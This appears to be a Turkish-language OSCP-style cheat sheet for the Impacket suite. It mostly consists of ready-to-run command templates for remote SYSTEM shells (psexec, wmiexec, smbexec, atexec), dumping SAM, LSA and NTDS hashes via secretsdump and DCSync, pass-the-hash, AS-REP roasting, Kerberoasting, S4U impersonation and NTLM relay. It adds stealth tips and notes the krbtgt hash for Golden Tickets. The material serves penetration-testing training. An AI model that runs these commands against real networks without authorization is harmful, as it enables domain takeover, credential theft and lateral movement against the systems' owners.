Post ✓ EXAM-SAFE orta :445 :135:139:88 :389

Impacket Suite: PsExec/WMIExec/SMBExec, Secretsdump, Kerberos Saldirilari ve NTLM Relay

Impacket araclariyla uzaktan komut yurutme (psexec/wmiexec/smbexec/dcomexec/atexec), credential dumping (secretsdump/DCSync), Kerberos saldirilari (GetNPUsers AS-REP, GetUserSPNs Kerberoasting, getST), ve NTLM relay (ntlmrelayx) referansi.

ÖN KOŞULLAR

Hedefe SMB(445)/RPC(135)/WinRM erisimi
RCE araclari icin local admin credential (psexec/wmiexec/smbexec)
AS-REP roast icin gecerli kullanici listesi; Kerberoast icin domain user credential
impacket kurulu (pipx install impacket / apt install impacket-scripts)

┌──

Komutlar

impacket-psexec ✓ EXAM-SAFE admin

impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}

SMB uzerinden servis olusturarak SYSTEM olarak interaktif shell (gurultulu, diske binary dusurur) WADComs — Impacket-PsExec

impacket-wmiexec ✓ EXAM-SAFE admin

impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}

WMI (DCOM/135) uzerinden yari-interaktif komut yurutme — psexec'e gore daha sessiz, diske binary dusurmez HackTricks — WMIExec / Lateral Movement

impacket-smbexec ✓ EXAM-SAFE admin

impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}

SMB + servis ile komut yurutme; binary diske dusurmeyen alternatif RCE HackTricks — SMBExec

impacket-secretsdump ✓ EXAM-SAFE admin

impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}

Uzaktan SAM, LSA secrets ve (DC ise) NTDS.dit hashlerini cek — pass-the-hash icin altin kaynak HackTricks — Secretsdump / DCSync

impacket-secretsdump ✓ EXAM-SAFE admin

impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}}

DCSync ile DC'den tum domain hashlerini (krbtgt dahil) replikasyon yoluyla cek HackTricks — DCSync via secretsdump

impacket-GetNPUsers ✓ EXAM-SAFE

impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat

AS-REP Roasting: Kerberos preauth gerektirmeyen kullanicilarin crackable hashlerini topla HackTricks — AS-REP Roasting

impacket-GetUserSPNs ✓ EXAM-SAFE user

impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash

Kerberoasting: SPN'li servis hesaplarinin TGS hashlerini cek (offline crack icin) HackTricks — Kerberoasting

impacket-getST ✓ EXAM-SAFE user

impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}}

S4U (constrained delegation / RBCD) ile baska kullaniciyi taklit eden servis ticket'i al HackTricks — Constrained Delegation / S4U

impacket-ntlmrelayx ⚠ RESTRICTED

impacket-ntlmrelayx -tf targets.txt -smb2support

Yakalanan NTLM kimlik dogrulamasini baska hedeflere relay et (SMB signing kapaliysa) HackTricks — NTLM Relay / ntlmrelayx

impacket-atexec ✓ EXAM-SAFE admin

impacket-atexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} "whoami"

Task Scheduler (atsvc) uzerinden tek komut yurutme — diger RCE yontemleri bloklanmissa alternatif HackTricks — AtExec

impacket-psexec ✓ EXAM-SAFE admin

impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}}

Pass-the-Hash ile psexec/wmiexec/secretsdump — parola yerine NTLM hash kullan (-hashes LM:NT) HackTricks — Pass the Hash with Impacket

Genel Bakis

Impacket, Python ile yazilmis bir ag protokolu kutuphanesi ve arac setidir. OSCP/AD’de uzaktan komut yurutme, credential dumping ve Kerberos saldirilarinin bel kemigidir. Kali’de araclar impacket- onekiyle gelir (or. impacket-psexec); kaynaktan ise examples/ altinda psexec.py olarak bulunur.

Ortak kimlik dogrulama deseni: {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}}. Pass-the-Hash icin parola yerine -hashes LMHASH:NTHASH (LM kisimsiz icin -hashes :{{NTHASH}}). Kerberos icin -k -no-pass (ccache KRB5CCNAME ile).

Uzaktan Komut Yurutme (RCE) — Karsilastirma

Tumu local admin credential gerektirir.

psexec: Servis olusturup binary diske dusurur, SYSTEM shell verir. En guvenilir ama en gurultulu; AV tetikler.
wmiexec: WMI/DCOM (135) uzerinden, diske binary dusurmez, yari-interaktif. En sessiz ve OSCP’de tercih edilen.
smbexec: Servis + SMB, binary dusurmeyen pseudo-shell.
dcomexec: DCOM nesneleri (MMC20, ShellWindows) ile RCE; psexec/wmiexec bloklandiginda alternatif.
atexec: Task Scheduler ile tek-komut; cikti bir dosyaya yazilip okunur.

Hangisinin calisacagini hedef konfigurasyonu belirler; biri bloklanirsa digerini deneyin.

Credential Dumping — secretsdump

Local: SAM + LSA secrets + cached domain credentials cikarir.
-just-dc / -just-dc-ntlm: DC hedefinde DCSync ile NTDS.dit’ten tum domain hashleri (krbtgt dahil). krbtgt hashi Golden Ticket icin kullanilir.
Cikan NTLM hashleri dogrudan Pass-the-Hash (psexec/wmiexec/evil-winrm) veya hashcat ile crack icin kullanilir.

Kerberos Saldirilari

GetNPUsers (AS-REP Roasting): DONT_REQ_PREAUTH set kullanicilarin AS-REP’i preauth olmadan istenir; cikan hash offline craklenir. Credential gerektirmez (-no-pass), sadece kullanici listesi.
GetUserSPNs (Kerberoasting): SPN tanimli servis hesaplarinin TGS-REP hashleri istenir. Gecerli bir domain user credential yeterli. Cikan $krb5tgs$ hashleri hashcat mode 13100 ile craklenir.
getST (S4U / delegation): Constrained delegation veya Resource-Based Constrained Delegation (RBCD) senaryolarinda -impersonate ile ayricalikli kullaniciyi taklit eden servis ticket’i uretir.

NTLM Relay — ntlmrelayx

SMB signing kapali hedeflerde, yakalanan (or. Responder ile poison edilen) NTLM kimlik dogrulamasini baska makinelere relay eder; basariliysa komut yurutur, SAM dumplar veya LDAP’a relay ile ADCS/RBCD saldirisi yapar. examSafety: restricted — otomatik/MITM bilesenleri OSCP’de dikkatli kullanilmali, sinav kapsamini teyit edin.

Notlar

Saat senkronu Kerberos icin kritiktir: KRB_AP_ERR_SKEW hatasinda ntpdate {{DC_IP}} veya faketime kullanin.
-dc-ip {{DC_IP}} ve /etc/hosts’a DC FQDN eklemek isim cozumleme sorunlarini onler.
Clock/DNS dogru degilse Kerberos tabanli araclar (GetUserSPNs, getST) sessizce basarisiz olur.

┌──

Kaynaklar

↗ Impacket GitHub (Fortra/SecureAuth)↗ HackTricks — Lateral Movement (PsExec/WmiExec/SmbExec)↗ WADComs — Impacket